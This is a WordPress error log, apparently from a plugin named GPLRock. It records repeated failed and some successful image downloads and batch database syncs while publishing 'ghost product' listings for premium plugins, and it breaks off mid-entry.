https://meldwp.com/wp-content/uploads/comment-system-plugin-for-wordpress--ajax-comments---comment-press-23603.webp [08-Mar-2026 22:22:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: comment-system-plugin-for-wordpress-ajax-comments-comment-press [08-Mar-2026 22:22:56 UTC] GPLRock: Image download failed for product wiloke-business-hours-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:58 UTC] GPLRock: Image download failed for product wiloke-business-hours-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-business-hours-for-elementor-31855.webp for product wiloke-business-hours-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:00 UTC] GPLRock: Image download failed for product wiloke-business-hours-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:02 UTC] GPLRock: Image download failed for product wiloke-business-hours-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-business-hours-for-elementor-31855.webp for product wiloke-business-hours-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:04 UTC] GPLRock WARNING: Image download failed for product wiloke-business-hours-for-elementor. URL: https://meldwp.com/wp-content/uploads/wiloke-business-hours-for-elementor-31855.webp [08-Mar-2026 22:23:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wiloke-business-hours-for-elementor [08-Mar-2026 22:23:04 UTC] GPLRock: Image download failed for product woocommerce-product-licenser-elite-licenser-pro-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:06 UTC] GPLRock: Image download failed for product woocommerce-product-licenser-elite-licenser-pro-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-licenser--elite-licenser-pro-addon-29438.webp for product woocommerce-product-licenser-elite-licenser-pro-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:08 UTC] GPLRock: Image download failed for product woocommerce-product-licenser-elite-licenser-pro-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:11 UTC] GPLRock: Image download failed for product woocommerce-product-licenser-elite-licenser-pro-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-licenser--elite-licenser-pro-addon-29438.webp for product woocommerce-product-licenser-elite-licenser-pro-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:13 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-licenser-elite-licenser-pro-addon. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-licenser--elite-licenser-pro-addon-29438.webp [08-Mar-2026 22:23:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-licenser-elite-licenser-pro-addon [08-Mar-2026 22:23:13 UTC] GPLRock: Image download failed for product dynamic-step-process-panels (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:15 UTC] GPLRock: Image download failed for product dynamic-step-process-panels (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dynamic-step-process-panels-6878.webp for product dynamic-step-process-panels after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:17 UTC] GPLRock: Image download failed for product dynamic-step-process-panels (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:19 UTC] GPLRock: Image download failed for product dynamic-step-process-panels (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dynamic-step-process-panels-6878.webp for product dynamic-step-process-panels after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:22 UTC] GPLRock WARNING: Image download failed for product dynamic-step-process-panels. URL: https://meldwp.com/wp-content/uploads/dynamic-step-process-panels-6878.webp [08-Mar-2026 22:23:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dynamic-step-process-panels [08-Mar-2026 22:23:23 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1700, Total: 200/9737 [08-Mar-2026 22:23:24 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:23:26 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:23:27 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1800, Total: 300/9737 [08-Mar-2026 22:23:27 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:23:29 UTC] GPLRock: Image download failed for product most-wanted-wordpress-plugins-pack (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:29 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:23:30 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 22:23:30 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1900, Total: 400/9737 [08-Mar-2026 22:23:31 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:23:31 UTC] GPLRock: Image download failed for product most-wanted-wordpress-plugins-pack (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:31 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:23:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/most-wanted-wordpress-plugins-pack-29779.webp for product most-wanted-wordpress-plugins-pack after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:34 UTC] GPLRock: Image download failed for product most-wanted-wordpress-plugins-pack (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:36 UTC] GPLRock: Image download failed for product most-wanted-wordpress-plugins-pack (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/most-wanted-wordpress-plugins-pack-29779.webp for product most-wanted-wordpress-plugins-pack after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:38 UTC] GPLRock WARNING: Image download failed for product most-wanted-wordpress-plugins-pack. URL: https://meldwp.com/wp-content/uploads/most-wanted-wordpress-plugins-pack-29779.webp [08-Mar-2026 22:23:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: most-wanted-wordpress-plugins-pack [08-Mar-2026 22:23:39 UTC] GPLRock: Image downloaded successfully for product wordpress-appointment-schedule-booking-system-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-be251e0b.webp [08-Mar-2026 22:23:39 UTC] GPLRock: Using pre-downloaded image for product wordpress-appointment-schedule-booking-system-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-be251e0b.webp [08-Mar-2026 22:23:39 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-appointment-schedule-booking-system-pro [08-Mar-2026 22:23:39 UTC] GPLRock: Image download failed for product vkomatic-automatic-post-generator-and-vkontakte-auto-poster-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:41 UTC] GPLRock: Image download failed for product vkomatic-automatic-post-generator-and-vkontakte-auto-poster-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vkomatic-automatic-post-generator-and-vkontakte-auto-poster-plugin-for-wordpress-2816.webp for product vkomatic-automatic-post-generator-and-vkontakte-auto-poster-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:44 UTC] GPLRock: Image download failed for product vkomatic-automatic-post-generator-and-vkontakte-auto-poster-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:46 UTC] GPLRock: Image download failed for product vkomatic-automatic-post-generator-and-vkontakte-auto-poster-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vkomatic-automatic-post-generator-and-vkontakte-auto-poster-plugin-for-wordpress-2816.webp for product vkomatic-automatic-post-generator-and-vkontakte-auto-poster-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:48 UTC] GPLRock WARNING: Image download failed for product vkomatic-automatic-post-generator-and-vkontakte-auto-poster-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/vkomatic-automatic-post-generator-and-vkontakte-auto-poster-plugin-for-wordpress-2816.webp [08-Mar-2026 22:23:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vkomatic-automatic-post-generator-and-vkontakte-auto-poster-plugin-for-wordpress [08-Mar-2026 22:23:49 UTC] GPLRock: Image download failed for product starto-woocommerce-responsive-email-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:51 UTC] GPLRock: Image download failed for product starto-woocommerce-responsive-email-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/starto---woocommerce-responsive-email-template-19625.webp for product starto-woocommerce-responsive-email-template after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:54 UTC] GPLRock: Image download failed for product starto-woocommerce-responsive-email-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:56 UTC] GPLRock: Image download failed for product starto-woocommerce-responsive-email-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:23:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/starto---woocommerce-responsive-email-template-19625.webp for product starto-woocommerce-responsive-email-template after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:23:58 UTC] GPLRock WARNING: Image download failed for product starto-woocommerce-responsive-email-template. URL: https://meldwp.com/wp-content/uploads/starto---woocommerce-responsive-email-template-19625.webp [08-Mar-2026 22:23:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: starto-woocommerce-responsive-email-template [08-Mar-2026 22:23:59 UTC] GPLRock: Image download failed for product tiva-testimonials-slider-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:01 UTC] GPLRock: Image download failed for product tiva-testimonials-slider-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tiva-testimonials-slider-for-wordpress-19959.webp for product tiva-testimonials-slider-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:03 UTC] GPLRock: Image download failed for product tiva-testimonials-slider-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:05 UTC] GPLRock: Image download failed for product tiva-testimonials-slider-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tiva-testimonials-slider-for-wordpress-19959.webp for product tiva-testimonials-slider-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:07 UTC] GPLRock WARNING: Image download failed for product tiva-testimonials-slider-for-wordpress. URL: https://meldwp.com/wp-content/uploads/tiva-testimonials-slider-for-wordpress-19959.webp [08-Mar-2026 22:24:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tiva-testimonials-slider-for-wordpress [08-Mar-2026 22:24:08 UTC] GPLRock: Image download failed for product mememe-the-meme-generator-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:10 UTC] GPLRock: Image download failed for product mememe-the-meme-generator-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mememe---the-meme-generator--wp-plugin-13641.webp for product mememe-the-meme-generator-wp-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:12 UTC] GPLRock: Image download failed for product mememe-the-meme-generator-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:14 UTC] GPLRock: Image download failed for product mememe-the-meme-generator-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mememe---the-meme-generator--wp-plugin-13641.webp for product mememe-the-meme-generator-wp-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:16 UTC] GPLRock WARNING: Image download failed for product mememe-the-meme-generator-wp-plugin. URL: https://meldwp.com/wp-content/uploads/mememe---the-meme-generator--wp-plugin-13641.webp [08-Mar-2026 22:24:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mememe-the-meme-generator-wp-plugin [08-Mar-2026 22:24:16 UTC] GPLRock: Image download failed for product woocommerce-cart-plugin-ultimate-shopping-cart-solution (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:18 UTC] GPLRock: Image download failed for product woocommerce-cart-plugin-ultimate-shopping-cart-solution (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-cart-plugin---ultimate-shopping-cart-solution-4886.webp for product woocommerce-cart-plugin-ultimate-shopping-cart-solution after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:21 UTC] GPLRock: Image download failed for product woocommerce-cart-plugin-ultimate-shopping-cart-solution (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:24 UTC] GPLRock: Image download failed for product woocommerce-cart-plugin-ultimate-shopping-cart-solution (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-cart-plugin---ultimate-shopping-cart-solution-4886.webp for product woocommerce-cart-plugin-ultimate-shopping-cart-solution after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:26 UTC] GPLRock WARNING: Image download failed for product woocommerce-cart-plugin-ultimate-shopping-cart-solution. URL: https://meldwp.com/wp-content/uploads/woocommerce-cart-plugin---ultimate-shopping-cart-solution-4886.webp [08-Mar-2026 22:24:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-cart-plugin-ultimate-shopping-cart-solution [08-Mar-2026 22:24:26 UTC] GPLRock: Image download failed for product wp-bakery-autoresponder-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:28 UTC] GPLRock: Image download failed for product wp-bakery-autoresponder-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-bakery-autoresponder-addon-10719.webp for product wp-bakery-autoresponder-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:30 UTC] GPLRock: Image download failed for product wp-bakery-autoresponder-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:32 UTC] GPLRock: Image download failed for product wp-bakery-autoresponder-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-bakery-autoresponder-addon-10719.webp for product wp-bakery-autoresponder-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:35 UTC] GPLRock WARNING: Image download failed for product wp-bakery-autoresponder-addon. URL: https://meldwp.com/wp-content/uploads/wp-bakery-autoresponder-addon-10719.webp [08-Mar-2026 22:24:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-bakery-autoresponder-addon [08-Mar-2026 22:24:35 UTC] GPLRock: Image downloaded successfully for product pixelphoto-the-ultimate-image-sharing-photo-social-network-platform (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb899d1e.webp [08-Mar-2026 22:24:35 UTC] GPLRock: Using pre-downloaded image for product pixelphoto-the-ultimate-image-sharing-photo-social-network-platform: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb899d1e.webp [08-Mar-2026 22:24:35 UTC] GPLRock: Ghost product published with image - Product ID: pixelphoto-the-ultimate-image-sharing-photo-social-network-platform [08-Mar-2026 22:24:35 UTC] GPLRock: Image download failed for product wpbookit-twilio-smswhatsapp-notification-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:37 UTC] GPLRock: Image download failed for product wpbookit-twilio-smswhatsapp-notification-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbookit---twilio-smswhatsapp-notification-addon-29364.webp for product wpbookit-twilio-smswhatsapp-notification-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:39 UTC] GPLRock: Image download failed for product wpbookit-twilio-smswhatsapp-notification-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:42 UTC] GPLRock: Image download failed for product wpbookit-twilio-smswhatsapp-notification-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbookit---twilio-smswhatsapp-notification-addon-29364.webp for product wpbookit-twilio-smswhatsapp-notification-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:44 UTC] GPLRock WARNING: Image download failed for product wpbookit-twilio-smswhatsapp-notification-addon. URL: https://meldwp.com/wp-content/uploads/wpbookit---twilio-smswhatsapp-notification-addon-29364.webp [08-Mar-2026 22:24:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbookit-twilio-smswhatsapp-notification-addon [08-Mar-2026 22:24:44 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1800, Total: 300/9737 [08-Mar-2026 22:24:44 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:24:47 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 22:24:48 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1900, Total: 300/9737 [08-Mar-2026 22:24:48 UTC] GPLRock: Image download failed for product video-player-fullscreen-video-background-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:49 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:24:50 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 22:24:51 UTC] GPLRock: Image download failed for product video-player-fullscreen-video-background-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-player--fullscreen-video-background---wp-plugin-31939.webp for product video-player-fullscreen-video-background-wp-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:53 UTC] GPLRock: Image download failed for product video-player-fullscreen-video-background-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:55 UTC] GPLRock: Image download failed for product video-player-fullscreen-video-background-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-player--fullscreen-video-background---wp-plugin-31939.webp for product video-player-fullscreen-video-background-wp-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:24:57 UTC] GPLRock WARNING: Image download failed for product video-player-fullscreen-video-background-wp-plugin. URL: https://meldwp.com/wp-content/uploads/video-player--fullscreen-video-background---wp-plugin-31939.webp [08-Mar-2026 22:24:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: video-player-fullscreen-video-background-wp-plugin [08-Mar-2026 22:24:57 UTC] GPLRock: Image download failed for product lana-two-factor-with-telegram-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:24:59 UTC] GPLRock: Image download failed for product lana-two-factor-with-telegram-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lana-two-factor-with-telegram-for-wordpress-4824.webp for product lana-two-factor-with-telegram-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:01 UTC] GPLRock: Image download failed for product lana-two-factor-with-telegram-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:03 UTC] GPLRock: Image download failed for product lana-two-factor-with-telegram-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lana-two-factor-with-telegram-for-wordpress-4824.webp for product lana-two-factor-with-telegram-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:05 UTC] GPLRock WARNING: Image download failed for product lana-two-factor-with-telegram-for-wordpress. URL: https://meldwp.com/wp-content/uploads/lana-two-factor-with-telegram-for-wordpress-4824.webp [08-Mar-2026 22:25:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lana-two-factor-with-telegram-for-wordpress [08-Mar-2026 22:25:06 UTC] GPLRock: Image downloaded successfully for product woocommerce-group-buy-and-deals (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d4a15631.webp [08-Mar-2026 22:25:06 UTC] GPLRock: Using pre-downloaded image for product woocommerce-group-buy-and-deals: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d4a15631.webp [08-Mar-2026 22:25:06 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-group-buy-and-deals [08-Mar-2026 22:25:06 UTC] GPLRock: Image downloaded successfully for product photography-addons-for-wpbakery-page-builder-photobakery (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1173fce7.webp [08-Mar-2026 22:25:06 UTC] GPLRock: Using pre-downloaded image for product photography-addons-for-wpbakery-page-builder-photobakery: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1173fce7.webp [08-Mar-2026 22:25:06 UTC] GPLRock: Ghost product published with image - Product ID: photography-addons-for-wpbakery-page-builder-photobakery [08-Mar-2026 22:25:06 UTC] GPLRock: Image download failed for product body-calculators-for-wordpress-bmi-bfp-bai-body-fat-ideal-weight-and-others (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:08 UTC] GPLRock: Image download failed for product body-calculators-for-wordpress-bmi-bfp-bai-body-fat-ideal-weight-and-others (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/body-calculators-for-wordpress-bmi-bfp-bai-body-fat-ideal-weight-and-others-12281.webp for product body-calculators-for-wordpress-bmi-bfp-bai-body-fat-ideal-weight-and-others after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:12 UTC] GPLRock: Image download failed for product body-calculators-for-wordpress-bmi-bfp-bai-body-fat-ideal-weight-and-others (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:14 UTC] GPLRock: Image download failed for product body-calculators-for-wordpress-bmi-bfp-bai-body-fat-ideal-weight-and-others (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/body-calculators-for-wordpress-bmi-bfp-bai-body-fat-ideal-weight-and-others-12281.webp for product body-calculators-for-wordpress-bmi-bfp-bai-body-fat-ideal-weight-and-others after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:16 UTC] GPLRock WARNING: Image download failed for product body-calculators-for-wordpress-bmi-bfp-bai-body-fat-ideal-weight-and-others. URL: https://meldwp.com/wp-content/uploads/body-calculators-for-wordpress-bmi-bfp-bai-body-fat-ideal-weight-and-others-12281.webp [08-Mar-2026 22:25:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: body-calculators-for-wordpress-bmi-bfp-bai-body-fat-ideal-weight-and-others [08-Mar-2026 22:25:16 UTC] GPLRock: Image download failed for product paypal-button-paypal-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:18 UTC] GPLRock: Image download failed for product paypal-button-paypal-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paypal-button---paypal-plugin-for-wordpress-8264.webp for product paypal-button-paypal-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:21 UTC] GPLRock: Image download failed for product paypal-button-paypal-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:23 UTC] GPLRock: Image download failed for product paypal-button-paypal-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paypal-button---paypal-plugin-for-wordpress-8264.webp for product paypal-button-paypal-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:25 UTC] GPLRock WARNING: Image download failed for product paypal-button-paypal-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/paypal-button---paypal-plugin-for-wordpress-8264.webp [08-Mar-2026 22:25:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: paypal-button-paypal-plugin-for-wordpress [08-Mar-2026 22:25:25 UTC] GPLRock: Image download failed for product domina-domain-for-sale-auction-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:27 UTC] GPLRock: Image download failed for product domina-domain-for-sale-auction-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/domina---domain-for-sale--auction-plugin-22497.webp for product domina-domain-for-sale-auction-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:29 UTC] GPLRock: Image download failed for product domina-domain-for-sale-auction-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:31 UTC] GPLRock: Image download failed for product domina-domain-for-sale-auction-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/domina---domain-for-sale--auction-plugin-22497.webp for product domina-domain-for-sale-auction-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:33 UTC] GPLRock WARNING: Image download failed for product domina-domain-for-sale-auction-plugin. URL: https://meldwp.com/wp-content/uploads/domina---domain-for-sale--auction-plugin-22497.webp [08-Mar-2026 22:25:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: domina-domain-for-sale-auction-plugin [08-Mar-2026 22:25:35 UTC] GPLRock: Image download failed for product radio-player-with-playlist-shoutcast-and-icecast (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:37 UTC] GPLRock: Image download failed for product radio-player-with-playlist-shoutcast-and-icecast (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/radio-player-with-playlist---shoutcast-and-icecast-6870.webp for product radio-player-with-playlist-shoutcast-and-icecast after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:39 UTC] GPLRock: Image download failed for product radio-player-with-playlist-shoutcast-and-icecast (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:41 UTC] GPLRock: Image download failed for product radio-player-with-playlist-shoutcast-and-icecast (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:25:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/radio-player-with-playlist---shoutcast-and-icecast-6870.webp for product radio-player-with-playlist-shoutcast-and-icecast after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:25:43 UTC] GPLRock WARNING: Image download failed for product radio-player-with-playlist-shoutcast-and-icecast. URL: https://meldwp.com/wp-content/uploads/radio-player-with-playlist---shoutcast-and-icecast-6870.webp [08-Mar-2026 22:25:43 